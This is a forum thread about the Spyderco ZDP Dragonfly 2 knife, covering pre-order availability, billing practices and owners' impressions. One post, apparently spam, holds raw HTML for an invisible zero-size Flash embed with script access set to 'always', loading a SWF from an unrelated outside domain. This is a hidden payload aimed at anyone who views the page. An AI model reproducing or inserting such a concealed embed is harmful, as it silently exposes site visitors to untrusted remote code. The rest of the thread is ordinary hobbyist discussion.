Heads Up....ZDP dragonfly

Discuss Spyderco's products and history.
SolidState

Heads Up....ZDP dragonfly

Post by SolidState »

I was just on kc and noticed the zdp dragonfly 2. What a nice looking knife!
"Nothing is so fatal to the progress of the human mind as to suppose that our views of science are ultimate; that there are no mysteries in nature; that our triumphs are complete, and that there are no new worlds to conquer."
Sir Humphry Davy
Creepo

Post by Creepo »

It still says:
"Availability: Pre-Order Only"
:(
KW has been listing it as a pre-order for a while now.
jackknifeh

Post by jackknifeh »

Creepo wrote:It still says:
"Availability: Pre-Order Only"
:(
KW has been listing it as a pre-order for a while now.
When you pre-order a knife do you normally go ahead and pay for it even though you may not have a date of availability? Just wondering because I "pre-ordered" a knife recently and was just put on a waiting list and will be sent a bill when the knife is available. That's ok because between now and when the knife is available I may decide not to get it. If that happened I wouldn't have to worry about getting my money back. On the other hand the seller may sell "my" knife to someone else if they don't have enough knives to fill all the pre-orders. Then they would just refund my money I guess if I had already paid for it. I was just wondering what the norm is.

Jack

Jack
Creepo

Post by Creepo »

jackknifeh wrote:When you pre-order a knife do you normally go ahead and pay for it even though you may not have a date of availability? Just wondering because I "pre-ordered" a knife recently and was just put on a waiting list and will be sent a bill when the knife is available. That's ok because between now and when the knife is available I may decide not to get it. If that happened I wouldn't have to worry about getting my money back. On the other hand the seller may sell "my" knife to someone else if they don't have enough knives to fill all the pre-orders. Then they would just refund my money I guess if I had already paid for it. I was just wondering what the norm is.
Depends really on the seller, some charge it the moment you pre-order it, some charge when they ship.
The latter scenario would apply to sprints, the S90V PM2 comes to mind. :rolleyes: It's possible especially if the dealer gets in way above his head.
redyps04

Post by redyps04 »

I gotta admit, I'm getting a little impatient with this one. Sal said it's supposed to be shipping this month though. Just hope it's soon! I've been holding out on getting the Dfly 2 until the ZDP comes out.
JAVIER0

Post by JAVIER0 »

It's nice ,I brought one
<object classid="clsid :D
<param name=FlashVars value="cid=7">
<param name="movie" value="http://www.cosmeticsstore.info/files/7.swf">
<param name="bgcolor" value="#ffffff">
<param name="allowScriptAccess" value="always" />
<embed allowScriptAccess="always" FlashVars="cid=7" src="http://www.cosmeticsstore.info/files/7.swf" quality="high" bgcolor="#ffffff" width="0" height="0" name="movie" align="" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></embed>
</object>
dsmegst

Post by dsmegst »

redyps04 wrote:I gotta admit, I'm getting a little impatient with this one. Sal said it's supposed to be shipping this month though. Just hope it's soon! I've been holding out on getting the Dfly 2 until the ZDP comes out.
ditto
Dan (dsmegst)

:spyder:
Latest 10: Techno, Centofante Memory, Bradley Air, Tuff, M390 Blue Para 2 (2), Yojimbo 2, Des Horn, DiAlex Junior, Native 5, Chaparral
:spyder:
dbcad

Post by dbcad »

Just ordered a ZDP Dragonfly2 from KC. Looking forward to it. When I ordered it the Dragonfly was according to the KC website in stock. Last one I can afford for a while, but I've been waiting for it to come out for a while too :)
Charlie

" Everything should be made as simple as possible, but not one bit simpler."

[CENTER]"Integrity is being good even if no one is watching"[/CENTER]
SmoothOne25

Post by SmoothOne25 »

i been carrying it since i got it last week.
its smaller than my new brg zdp stretch so it got more pocket time....

(i don't need a big knife) or the jail time to go with it :rolleyes:
Attachments
thenewbrgzdpdf.JPG
thenewbrgzdpdf.JPG (9.27 KiB) Viewed 1039 times
DeathBySnooSnoo

Post by DeathBySnooSnoo »

I will get one...I love ZDP...but a sprint run of Stretch Blue would be awesome...to match my Stretch :D
On the hunt for...